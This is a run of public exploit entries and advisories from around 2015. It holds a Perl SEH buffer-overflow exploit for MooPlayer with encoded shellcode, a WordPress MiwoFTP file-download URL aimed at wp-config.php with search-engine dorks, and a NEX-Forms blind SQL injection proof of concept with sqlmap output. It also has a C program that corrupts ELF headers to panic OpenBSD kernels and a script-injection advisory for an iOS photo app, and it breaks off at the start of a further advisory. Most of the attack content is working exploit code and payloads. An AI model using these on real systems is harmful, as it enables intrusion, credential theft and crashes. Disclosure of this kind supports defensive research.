#!/usr/bin/perl
############################################################################################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow
# Date: 09-02-2015
# Exploit Author: Tomislav Paskalev
# Vulnerable Software: MooPlayer v1.3.0
# Vendor Homepage: https://mooplayer.jaleco.com/
# Software Link: http://www.exploit-db.com/apps/a2eba48a6789803f2a3aca8c93b86cb7-mooplayer-1.3.0.zip
# Version: 1.3.0
# Tested on: Windows XP SP2 EN
# OSVDB-ID: 118128
############################################################################################################
# Credits:
# Vulnerability identified by Samandeep Singh
# http://www.exploit-db.com/exploits/36022/
############################################################################################################
# Exploit notes:
# mooplayer.exe was not compiled with SafeSEH, but its addresses always contain \x00 (a bad
# character); such an address could still be used as the SEH handler, which would make the
# exploit work across multiple OS versions, but the shellcode space would be limited since
# \x00 would terminate the string
# other available modules (Win XP SP2 EN) - enough space for larger shellcode
# oledlg.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)
# OLEACC.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)
############################################################################################################
# Bad characters:
# "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09"
# "\x0b\x0c"
# "\x0e\x0f"
# "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19"
# "\x1a\x1b\x1c\x1d\x1e\x1f"
############################################################################################################
# How to exploit:
# MooPlayer -> File -> Open Media File -> Files of type: Playlists -> (navigate to created exploit
# file) -> Open
# OR drag and drop created exploit file into MooPlayer
############################################################################################################
# Thanks to:
# Samandeep Singh (PoC)
# Peter Van Eeckhoutte (exploit development tutorials)
# Offensive Security (IT security courses, admin support)
############################################################################################################
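use strict;
use warnings;

# Output file; MooPlayer opens it as a playlist (see "How to exploit" above).
my $file = "MooPlayer_messagebox.m3u";

# Total size of the generated playlist. The payload is padded with \x90 up to
# this length so that the file size (and therefore the crash layout) stays constant.
my $TARGET_LEN = 10000;

# Build the raw m3u payload:
#   [264 x 'A'] [nSEH: short jmp] [SEH: POP POP RET] [100 x NOP] [shellcode] [NOP padding]
# Returns the payload as a byte string of exactly $TARGET_LEN bytes.
# Dies instead of silently producing a short file if the fixed part alone is
# longer than $TARGET_LEN (the "x" operator yields "" for a negative count).
sub build_payload {
    my $junk    = "A" x 264;
    my $nextSEH = "\xeb\x20\x90\x90";     # jmp short +0x20: skip the SEH record, land in the NOP sled
    my $SEH     = pack('V', 0x74c96950);  # POP POP RET from oleacc.dll (Win XP SP2 EN)
                                          # bytes 50 69 c9 74 - none are in the bad-character list above
    my $NOPs    = "\x90" x 100;
    # msfpayload windows/messagebox
    # msfencode -e x86/alpha_upper
    # (alphanumeric encoding keeps the payload clear of the bad characters listed above)
    my $shellcode =
    "\x89\xe5\xd9\xf7\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49" .
    "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
    "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
    "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
    "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4e\x39\x5a" .
    "\x4b\x4d\x4b\x38\x59\x54\x34\x46\x44\x5a\x54\x46\x51\x39" .
    "\x42\x58\x32\x53\x47\x36\x51\x4f\x39\x32\x44\x4c\x4b\x44" .
    "\x31\x46\x50\x4c\x4b\x33\x46\x44\x4c\x4c\x4b\x44\x36\x35" .
    "\x4c\x4c\x4b\x57\x36\x55\x58\x4c\x4b\x53\x4e\x31\x30\x4c" .
    "\x4b\x50\x36\x46\x58\x50\x4f\x52\x38\x54\x35\x4c\x33\x36" .
    "\x39\x53\x31\x58\x51\x4b\x4f\x4d\x31\x45\x30\x4c\x4b\x42" .
    "\x4c\x57\x54\x47\x54\x4c\x4b\x57\x35\x57\x4c\x4c\x4b\x31" .
    "\x44\x51\x38\x33\x48\x35\x51\x4b\x5a\x4c\x4b\x50\x4a\x55" .
    "\x48\x4c\x4b\x31\x4a\x31\x30\x55\x51\x5a\x4b\x4b\x53\x56" .
    "\x54\x30\x49\x4c\x4b\x50\x34\x4c\x4b\x33\x31\x5a\x4e\x50" .
    "\x31\x4b\x4f\x56\x51\x59\x50\x4b\x4c\x4e\x4c\x4b\x34\x59" .
    "\x50\x53\x44\x55\x57\x49\x51\x38\x4f\x34\x4d\x33\x31\x59" .
    "\x57\x4a\x4b\x4c\x34\x47\x4b\x43\x4c\x57\x54\x51\x38\x34" .
    "\x35\x4d\x31\x4c\x4b\x31\x4a\x47\x54\x45\x51\x4a\x4b\x55" .
    "\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x4a\x35\x4c\x33" .
    "\x31\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x33\x31\x4b\x58\x4c" .
    "\x49\x30\x44\x51\x34\x35\x4c\x55\x31\x38\x43\x4e\x52\x44" .
    "\x48\x57\x59\x59\x44\x4d\x59\x4a\x45\x4b\x39\x39\x52\x35" .
    "\x38\x4c\x4e\x30\x4e\x44\x4e\x4a\x4c\x50\x52\x4d\x38\x4d" .
    "\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4b\x39\x30\x45\x34\x44\x4f" .
    "\x4b\x33\x4e\x49\x48\x4d\x32\x33\x43\x4d\x57\x55\x4c\x51" .
    "\x34\x51\x42\x4b\x58\x4c\x4e\x4b\x4f\x4b\x4f\x4b\x4f\x4d" .
    "\x59\x37\x35\x53\x38\x33\x58\x32\x4c\x42\x4c\x37\x50\x37" .
    "\x31\x43\x58\x50\x33\x37\x42\x36\x4e\x53\x54\x53\x58\x54" .
    "\x35\x32\x53\x33\x55\x53\x42\x4b\x38\x31\x4c\x47\x54\x44" .
    "\x4a\x4c\x49\x5a\x46\x50\x56\x4b\x4f\x31\x45\x53\x34\x4c" .
    "\x49\x39\x52\x56\x30\x4f\x4b\x4e\x48\x4f\x52\x30\x4d\x4f" .
    "\x4c\x4d\x57\x55\x4c\x31\x34\x56\x32\x4d\x38\x45\x31\x4b" .
    "\x4f\x4b\x4f\x4b\x4f\x53\x58\x46\x38\x31\x30\x51\x30\x51" .
    "\x30\x33\x58\x36\x34\x45\x35\x54\x33\x33\x44\x56\x51\x39" .
    "\x4b\x4d\x58\x51\x4c\x47\x54\x34\x44\x4b\x39\x5a\x43\x43" .
    "\x58\x52\x4e\x56\x4e\x31\x48\x31\x30\x55\x38\x53\x51\x34" .
    "\x34\x42\x49\x52\x4f\x32\x48\x54\x30\x42\x4c\x42\x49\x43" .
    "\x53\x33\x58\x35\x34\x37\x50\x35\x31\x34\x30\x45\x38\x32" .
    "\x4f\x35\x39\x54\x34\x45\x35\x45\x38\x33\x55\x33\x48\x52" .
    "\x50\x52\x4c\x45\x38\x44\x34\x32\x48\x35\x35\x57\x50\x53" .
    "\x58\x57\x50\x52\x4f\x55\x36\x31\x30\x55\x38\x33\x44\x32" .
    "\x45\x34\x38\x34\x34\x32\x48\x31\x30\x55\x33\x52\x4f\x42" .
    "\x4e\x32\x48\x51\x30\x43\x44\x32\x48\x43\x55\x43\x58\x32" .
    "\x4e\x31\x30\x42\x49\x42\x4e\x52\x48\x42\x55\x33\x44\x32" .
    "\x49\x52\x4f\x55\x38\x43\x55\x33\x48\x42\x45\x42\x43\x35" .
    "\x38\x52\x4f\x45\x34\x52\x45\x51\x30\x32\x48\x55\x35\x33" .
    "\x54\x37\x50\x53\x53\x35\x38\x30\x47\x45\x31\x45\x39\x32" .
    "\x4e\x30\x31\x39\x59\x4d\x58\x30\x4c\x57\x54\x50\x42\x4c" .
    "\x49\x4b\x51\x30\x31\x58\x52\x42\x4a\x57\x30\x31\x43\x50" .
    "\x51\x31\x42\x4b\x4f\x58\x50\x46\x51\x4f\x30\x50\x50\x4b" .
    "\x4f\x50\x55\x45\x58\x41\x41";

    my $head = $junk . $nextSEH . $SEH . $NOPs . $shellcode;
    my $pad  = $TARGET_LEN - length $head;
    # keep the exploit length consistent - but fail loudly instead of writing a
    # silently truncated file when the fixed part is already too long
    die sprintf("payload is %d bytes, longer than the %d-byte target\n",
                length $head, $TARGET_LEN) if $pad < 0;
    return $head . ("\x90" x $pad);
}

# Write $payload to $path as raw bytes. Dies on any I/O failure so a partially
# written or unwritable file is never mistaken for a good one.
sub write_payload {
    my ($path, $payload) = @_;
    open my $fh, '>', $path or die "open $path: $!\n";
    binmode $fh;                       # raw bytes: no newline translation on Windows
    print {$fh} $payload or die "write $path: $!\n";
    close $fh or die "close $path: $!\n";
    return;
}

write_payload($file, build_payload()) unless caller;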
######################
# Exploit Title : WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download
# Exploit Author : Dadou Dz
# Software Link : Premium
# Dork Google: inurl:com_miwoftp
# Affected version: 1.0.5
# Vendor Homepage:
http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog
# Date : 2015-04-20
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# Exploit:
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=[....somefile....]&order=name&srt=yes
"download_file" : wp-config.php (the "item" value names the file to fetch; wp-config.php holds the database credentials)
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes
Note: the request goes through wp-admin/admin.php, which WordPress serves only to a logged-in user, so reproduce it from an authenticated session and check which capability (if any) the plugin's download action requires before rating the exposure.
#####################
Discovered By : Dadou Dz
My Email - dadoudzdz@gmail.com
fb: fb.com/Dz2Team
[ Thanks To ]
Toxic Dz ~ faroukovic DZ _ PaWL _ bl4ck-dz _ Abdellah Elmaghribi
Algerian To The Core - Dz Team - 1337day Community Algeria - Fallaga Team
AnonGhost Team - Anonymous Dz - Backup Sec Dz
Sec4ever.com - Gaza-Hacker.net - Dev-Tun.tn - Fallaga.tn - Aljyyosh.com -
dz-root.com
And All My Friends - All Muslims Hackers - All Algerian Hackers
#####################
######################
# Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability
# Exploit Author : Claudio Viviani
# Website Author: http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
# Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip
# Dork Google: inurl:nex-forms-express-wp-form-builder
# index of nex-forms-express-wp-form-builder
# Date : 2015-03-29
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# Info:
The "submit_nex_form" AJAX handler (reached through admin-ajax.php) is affected by an SQL injection vulnerability:
the "nex_forms_Id" parameter is used in a query without sanitization. The advisory does not say whether the action is registered for unauthenticated (nopriv) callers; confirm that before rating the exposure.
# PoC Exploit:
http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
# Poc Video:
http://youtu.be/04G08Cbrx1I
# PoC sqlmap:
sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10" -p nex_forms_Id --dbms mysql
[23:15:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[23:15:48] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[23:15:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:15:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:16:07] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
---
Parameter: nex_forms_Id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
---
[23:16:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0.12
######################
# Vulnerability Disclosure Timeline:
2015-03-29: Discovered vulnerability
2015-04-16: Vendor Notification
2015-04-17: Vendor Response/Feedback
2015-04-21: Vendor shipped a fix/patch under the same version number (3.0), so the plugin version string cannot be used to tell patched from vulnerable installs
2015-04-21: Public Disclosure
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
/*
# Exploit Title: OpenBSD <= 5.6 - Multiple Local Kernel Panics
# Exploit Author: nitr0us
# Vendor Homepage: http://www.openbsd.org
# Version: 5.6
# Tested on: OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014), OpenBSD 5.6 i386, OpenBSD 5.5 i386
* - 0xb16b00b5.c
*
* - Alejandro Hernandez (@nitr0usmx)
* - Mexico 2015
*
* #########################################################################
* # OpenBSD <= 5.6 kernel panic()'s in sys/uvm/uvm_map.c #
* #########################################################################
*
* Tested under:
* - OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014)
* - OpenBSD 5.6 i386
* - OpenBSD 5.5 i386
*
* https://www.youtube.com/watch?feature=player_detailpage&v=PReopSQZOrY#t=20
*
*/
#include <sys/types.h>
#include <sys/param.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#ifndef __OpenBSD__
#error "Not OpenBSD !!!1111";
#else
#include <sys/exec_elf.h>
#endif
#ifndef __i386__
#error "Not i386 !!!1111";
#endif
/* ASCII-art banner; main() prints it with printf("%s") right before the
 * program-header patches are applied. Purely cosmetic. */
char big_b00bz[] =
" 8M:::::::8888M:::::888:::::::88:::8888888::::::::Mm\n"
" 88MM:::::8888M:::::::88::::::::8:::::888888:::M:::::M\n"
" 8888M:::::888MM::::::::8:::::::::::M::::8888::::M::::M\n"
" 88888M:::::88:M::::::::::8:::::::::::M:::8888::::::M::M\n"
" 88 888MM:::888:M:::::::::::::::::::::::M:8888:::::::::M:\n"
" 8 88888M:::88::M:::::::::::::::::::::::MM:88::::::::::::M\n"
" 88888M:::88::M::::::::::*88*::::::::::M:88::::::::::::::M\n"
" 888888M:::88::M:::::::::88@@88:::::::::M::88::::::::::::::M\n"
" 888888MM::88::MM::::::::88@@88:::::::::M:::8::::::::::::::*8\n"
" 88888 M:::8::MM:::::::::*88*::::::::::M:::::::::::::::::88@@\n"
" 8888 MM::::::MM:::::::::::::::::::::MM:::::::::::::::::88@@\n"
" 888 M:::::::MM:::::::::::::::::::MM::M::::::::::::::::*8\n"
" 888 MM:::::::MMM::::::::::::::::MM:::MM:::::::::::::::M\n"
" 88 M::::::::MMMM:::::::::::MMMM:::::MM::::::::::::MM\n"
" 88 MM:::::::::MMMMMMMMMMMMMMM::::::::MMM::::::::MMM\n"
" 88 MM::::::::::::MMMMMMM::::::::::::::MMMMMMMMMM\n"
" 88 8MM::::::::::::::::::::::::::::::::::MMMMMM\n"
" 8 88MM::::::::::::::::::::::M:::M::::::::MM\n"
" 888MM::::::::::::::::::MM::::::MM::::::M";
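/* Number of program headers the patches below index into (pht[9] is the highest). */
enum { PHDRS_NEEDED = 10 };

/*
 * Sanity-check the mapped image before the program-header patches: it must
 * carry the ELF magic, be a 32-bit image whose program-header entries have the
 * size this code indexes with, and have at least PHDRS_NEEDED headers that all
 * lie inside the file (otherwise the writes land outside the mapping).
 * Returns 0 when the checks pass, -1 (with a message on stderr) otherwise.
 */
static int check_elf(const char *name, const Elf32_Ehdr *hdr, off_t size)
{
    off_t pht_end;

    if (hdr->e_ident[EI_MAG0] != ELFMAG0 || hdr->e_ident[EI_MAG1] != ELFMAG1 ||
        hdr->e_ident[EI_MAG2] != ELFMAG2 || hdr->e_ident[EI_MAG3] != ELFMAG3) {
        fprintf(stderr, "%s: not an ELF file\n", name);
        return -1;
    }
    if (hdr->e_ident[EI_CLASS] != ELFCLASS32 ||
        hdr->e_phentsize != sizeof(Elf32_Phdr)) {
        fprintf(stderr, "%s: not a 32-bit ELF image\n", name);
        return -1;
    }
    pht_end = (off_t)hdr->e_phoff + (off_t)PHDRS_NEEDED * (off_t)sizeof(Elf32_Phdr);
    if (hdr->e_phnum < PHDRS_NEEDED || pht_end > size) {
        fprintf(stderr, "%s: need at least %d program headers inside the file (has %u)\n",
                name, PHDRS_NEEDED, (unsigned)hdr->e_phnum);
        return -1;
    }
    return 0;
}

/*
 * Entry point.  argv[1] names an i386 ELF executable that is modified IN
 * PLACE: three program-header fields are corrupted and the file is then
 * executed so that the kernel's ELF loader reaches the panic() described in
 * the header.  Use a throwaway copy of a binary; the original is not restored.
 *
 * Returns 1 on a usage, validation or system-call failure.  On a vulnerable
 * kernel the system() call never returns; if it does, the author's joke value
 * is returned (the shell only sees its low 8 bits, 0x7e).
 */
int main(int argc, char **argv)
{
    Elf32_Ehdr *hdr;
    Elf32_Phdr *pht;
    struct stat statinfo;
    char *elfptr;
    int fd;

    if (argc != 2) {
        fprintf(stderr, "Usage: %s <elf_exec>\n", argv[0]);
        return 1;
    }

    fd = open(argv[1], O_RDWR);
    if (fd == -1) {
        perror(argv[1]);
        return 1;
    }
    if (fstat(fd, &statinfo) == -1 || statinfo.st_size < (off_t)sizeof(Elf32_Ehdr)) {
        fprintf(stderr, "%s: cannot stat, or too small to be an ELF file\n", argv[1]);
        close(fd);
        return 1;
    }

    elfptr = mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (elfptr == MAP_FAILED) {
        perror("mmap");
        close(fd);
        return 1;
    }
    hdr = (Elf32_Ehdr *)elfptr;
    if (check_elf(argv[1], hdr, statinfo.st_size) == -1) {
        munmap(elfptr, statinfo.st_size);
        close(fd);
        return 1;
    }
    pht = (Elf32_Phdr *)(elfptr + hdr->e_phoff);

    printf("%s", big_b00bz);

    /* The author reports that both of these overwrites are required. */
    pht[9].p_type = 0x7defaced;
    pht[2].p_filesz = (arc4random() % 2) ? 0x41414141 : 0x43434343;
    sleep(3 + (arc4random() % 3));

    /* Pick one of three variants at random (roughly one third each). */
    if (arc4random() % 3 == 2) {
        puts(" .. I like b1g 0nez !!");        /* no further patch */
    } else if (arc4random() % 2) {
        puts(" .. want s0me ?!");
        pht[5].p_vaddr = 0xb16b00b5;
    } else {
        puts(" .. j00 like it ?!");
        pht[5].p_vaddr = 0x0ace55e8;
    }

    /* Push the patched headers to the file before it is executed.  MAP_SHARED
     * writes survive munmap, but sync the whole mapping explicitly (and
     * synchronously) so the exec below sees them. */
    if (msync(elfptr, statinfo.st_size, MS_SYNC) == -1)
        perror("msync");
    munmap(elfptr, statinfo.st_size);
    close(fd);
    sleep(3 + (arc4random() % 3));

    /* system() hands the path to /bin/sh, so it must not contain shell
     * metacharacters or whitespace.  On a vulnerable kernel this call does
     * not return: loading the corrupted image triggers the panic(). */
    system(argv[1]);
    puts("... s0rry, this piece of sh1t didn't w0rk in j00r obsd\n");
    return 0xDEFECA7E;  /* exit status is truncated to the low 8 bits (0x7e) */
}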
Document Title:
===============
Photo Manager Pro 4.4.0 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1444
Release Date:
=============
2015-03-10
Vulnerability Laboratory ID (VL-ID):
====================================
1444
Common Vulnerability Scoring System:
====================================
8.6
Product & Service Introduction:
===============================
Do you have troubles for managing thousands of photos and videos? Do you have any private photos or videos? Are you looking for a photo portfolio app?
Photo Manager Pro is exactly you are looking for. Photo Manager Pro is extremely easy to use. TP Transfer: Transfer folders and files between computer
and device over wifi network. HTTP Transfer: Transfer files between computer and device over wifi network. View photos in the browser. Peer to Peer
Transfer: Directly transfer files between iPad, iPhone and iPod Touch over wifi network. USB Transfer: Import/Export photos from/to iTunes file sharing.
Basic Transfer: Import/Export photos from/to the Photos app.
(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/photo-manager-pro/id393858562 & http://www.linkusnow.com/photomanager/help/ipad/help_main.php )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a code execution vulnerability in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-03-10: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Linkus
Product: Photo Manager Pro - iOS Mobile Web Application (Wifi) 4.4.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
An arbitrary code execution vulnerability has been discovered in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
Note that, as the PoC below shows, the "code" executed is HTML/script injected into the app's WiFi web interface through the folder name
(a persistent, application-side script injection); the advisory does not demonstrate native code execution on the device. The vulnerability
allows remote attackers to run malicious script in the context of the vulnerable app's web UI and, through it, to attack the target mobile
device's users.
The vulnerability is located in the `folderName` value of the `newfolder.action` module. Remote attackers are able to manipulate the
`folderName` value in the `index.html#?w=300` file POST method request to compromise the application, user session information or connected
device components. The attacker tampers the new Folder POST method request to exchange the regular folderName value with special crafted code.
The injected input becomes visible in the main index page and in the sub-folder (path) view. The vector of the vulnerability is located on the application-side.
The security risk of the arbitrary code execution vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.
Exploitation of the arbitrary code execution vulnerability requires no user interaction or privileged web-application user account with password.
Note that the PoC session below was recorded with the cookie isenabledpasscode=false, i.e. with the app's passcode protection disabled; exploitability with the passcode enabled is not shown.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent
manipulation function or connected module context.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] newfolder.action
Vulnerable Parameter(s):
[+] folderName
Affected Module(s):
[+] Index (http://localhost:8080)
[+] Sub Category Path
Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Create Folder
<div id="main"><div id="breadcrumb">Home</div>
<div id="content"><ul id="folders_ul"><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=1"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=1">Family</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=2"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=2">Friends</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=3"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=3">Travel</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=4"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=4">Shopping</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=5"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></div></iframe></a></div></li></ul></div>
</div>
... after surfing to the created folder
<div id="wrapper">
<div id="header">
<div id="title">
<h1>Photo Manager Pro</h1>
</div>
</div>
<div id="main">
<div id="breadcrumb"><span id="breadcrumb_span"><a href="index.html">Home</a><label> > <a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></label></x></a></label></span></div>
<form id="download_form" action="download.action" method="post">
<div id="content"><ul></ul></div>
</form>
</div>
PoC: Vulnerable Source
}
function createFolder() {
$.ajax({
type: 'POST',
url: 'newfolder.action',
cache: false,
dataType: 'json',
data: {folderName:$('#foldername').attr('value'), isSubfolder:$('#is_subfolder_hidden').attr('value'), parentFolderID:$('#parent_folder_hidden').attr('value')},
async: false,
success: function(result) {
window.location.reload(false);
}
});
}
</script>
--- Poc Session Logs [POST] (Inject) ---
Status: 200[OK]
POST http://localhost:8080/newfolder.action
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[23] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/index.html]
Content-Length[50]
Cookie[isenabledpasscode=false]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
folderName[*/-CODE EXECUTION VULNERABILITY!;]
isSubfolder[0]
parentFolderID[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[23]
Date[Do., 05 März 2015 20:34:46 GMT]
Status: 200[OK]
GET http://localhost:8080/index.html
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[9421] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/browse_folder.html?folderID=6]
Cookie[isenabledpasscode=false]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[9421]
Date[Do., 05 März 2015 20:34:46 GMT]
Status: 200[OK]
GET http://localhost:8080/javascript/linkus.js
Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[397] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/index.html]
Cookie[isenabledpasscode=false]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[397]
Date[Do., 05 März 2015 20:34:46 GMT]
Reference(s):
http://localhost:8080/index.html
http://localhost:8080/newfolder.action
http://localhost:8080/index.html#?w=300
http://localhost:8080/browse_folder.html?folderID=5
Solution - Fix & Patch:
=======================
The vulnerability can be patched by validating the folderName value on input (reject or strip markup characters such as <, >, ", ' and ;) and by
HTML-encoding it wherever it is rendered (index listing, breadcrumb, sub-folder view). Output encoding is the essential control; input restriction
alone does not prevent the application-side script injection.
Security Risk:
==============
The security risk of the code execution vulnerability in the photo manager wifi service is estimated as high. (CVSS 8.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Mobile Drive HD v1.8 - File Include Web Vulnerability
References (Source):
====================
